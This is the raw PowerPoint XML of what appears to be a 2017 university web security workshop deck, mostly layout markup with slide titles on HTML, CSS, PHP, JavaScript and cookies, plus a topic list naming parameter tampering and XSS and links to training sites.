      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 37"/>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8" name="Shape 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="4038600" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square"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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1600200"/>
            <a:ext cx="4038600" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square"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Shape 40"/>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1" name="Shape 41"/>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2" name="Shape 42"/>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3" name="Shape 43"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 44"/>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5" name="Shape 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1535113"/>
            <a:ext cx="4040188" cy="639762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square"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6" name="Shape 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2174875"/>
            <a:ext cx="4040188" cy="3951288"/>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7" name="Shape 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645025" y="1535113"/>
            <a:ext cx="4041775" cy="639762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square"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48" name="Shape 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645025" y="2174875"/>
            <a:ext cx="4041775" cy="3951288"/>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49" name="Shape 49"/>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0" name="Shape 50"/>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1" name="Shape 51"/>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2" name="Shape 52"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Shape 53"/>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4" name="Shape 54"/>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7" name="Shape 57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Shape 58"/>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61" name="Shape 61"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="273050"/>
            <a:ext cx="3008313" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square"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 name="Shape 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575050" y="273050"/>
            <a:ext cx="5111750" cy="5853113"/>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64" name="Shape 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1435100"/>
            <a:ext cx="3008313" cy="4691063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square"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8" name="Shape 68"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Shape 69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792288" y="4800600"/>
            <a:ext cx="5486400" cy="566738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square"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0" name="Shape 70"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792288" y="612775"/>
            <a:ext cx="5486400" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="64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71" name="Shape 71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792288" y="5367338"/>
            <a:ext cx="5486400" cy="804862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square"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72" name="Shape 72"/>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4" name="Shape 74"/>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8"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" wrap="square"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descr="7b.jpg" id="15" name="Shape 15"/>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6" name="Shape 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="6583680"/>
            <a:ext cx="2743200" cy="26161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100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The University of Texas at Dallas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696200" y="6583680"/>
            <a:ext cx="1371600" cy="26161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100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>utdallas.edu</a:t>
            </a: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localhost/WebGoat/attack" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebScarab_Getting_Starte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codebashing.com/sql_demo" TargetMode="Externa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11.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId8"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xss-game.appspot.com/"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blog.barricade.io/cross-site-request-forgery-visually-explained/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://excess-xss.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crypto.stanford.edu/cs155old/cs155-spring09/lectures/17-web-site-sec.ppt" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slideshare.net/ColinEnglish/web-application-security-8584955" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/software-defenses-to-owasps-top-10-most-common-application-attacks/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.firewall.cx/linux-knowledgebase-tutorials/introduction-to-linux.html/299-linux-file-folder-permission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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2130425"/>
            <a:ext cx="7772400" cy="1470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93" name="Shape 93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="TexSAW2017.png" id="94" name="Shape 94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="6594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Shape 191"/>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HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Shape 192"/>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HTML code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>talk about html’s purpose</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Shape 19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HTML.png" id="194" name="Shape 194"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1568" l="1428" r="1360" t="22650"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-15850" y="1382675"/>
            <a:ext cx="9159851" cy="4561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CSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 201"/>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CSS Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>talk about CSS’s purpose</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Shape 202"/>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css-code.png" id="203" name="Shape 203"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600210"/>
            <a:ext cx="8229600" cy="43857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210" name="Shape 210"/>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211" name="Shape 21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web_application_architecture.png" id="212" name="Shape 212"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043573" y="1809750"/>
            <a:ext cx="7056866" cy="3238500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Shape 213"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3992325" y="2290075"/>
            <a:ext cx="1592100" cy="27582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Dynamic Web Page User 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Shape 220"/>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Screenshot (25).png" id="221" name="Shape 221"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028725" y="1727401"/>
            <a:ext cx="7217253" cy="481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Dynamic Web Page User 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Shape 22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Screenshot (23).png" id="229" name="Shape 229"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143875" y="1417650"/>
            <a:ext cx="6948099" cy="4632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Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Shape 236"/>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237" name="Shape 237"/>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9.png" id="238" name="Shape 238"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="8045"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="859250" y="1417650"/>
            <a:ext cx="7425497" cy="5121225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Shape 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3037650" y="3950800"/>
            <a:ext cx="3764400" cy="2610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240" name="Shape 240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3056275" y="5068775"/>
            <a:ext cx="2851200" cy="2610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247" name="Shape 247"/>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248" name="Shape 24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web_application_architecture.png" id="249" name="Shape 249"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043573" y="1809750"/>
            <a:ext cx="7056866" cy="3238500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Shape 250"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043575" y="2458225"/>
            <a:ext cx="4418400" cy="25899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PHP &amp; Server-Side Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Shape 257"/>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Show snippet of PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Talk about things PHP can do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Shape 25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PHP.gif" id="259" name="Shape 259"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457205" y="1417655"/>
            <a:ext cx="8229601" cy="40557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223625" y="274650"/>
            <a:ext cx="8703000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JavaScript &amp; Client-Side Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Shape 266"/>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Show snippet of javascript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>talk about things javascript can do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Shape 267"/>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javascript.PNG" id="268" name="Shape 268"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1845160"/>
            <a:ext cx="8229600" cy="28500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i="0" lang="en-US" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Topics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Shape 275"/>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Crash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rgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parameter Tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>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chemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2130425"/>
            <a:ext cx="7772400" cy="1470025"/>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dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="4400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Shape 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Shape 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2667000"/>
            <a:ext cx="8229600" cy="3459163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial Black"/>
              <a:ea typeface="Arial Black"/>
              <a:cs typeface="Arial Black"/>
              <a:sym typeface="Arial Black"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="7.jpg" id="103" name="Shape 10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04" name="Shape 104"/>
          <p:cNvSpPr txBox="1"/>
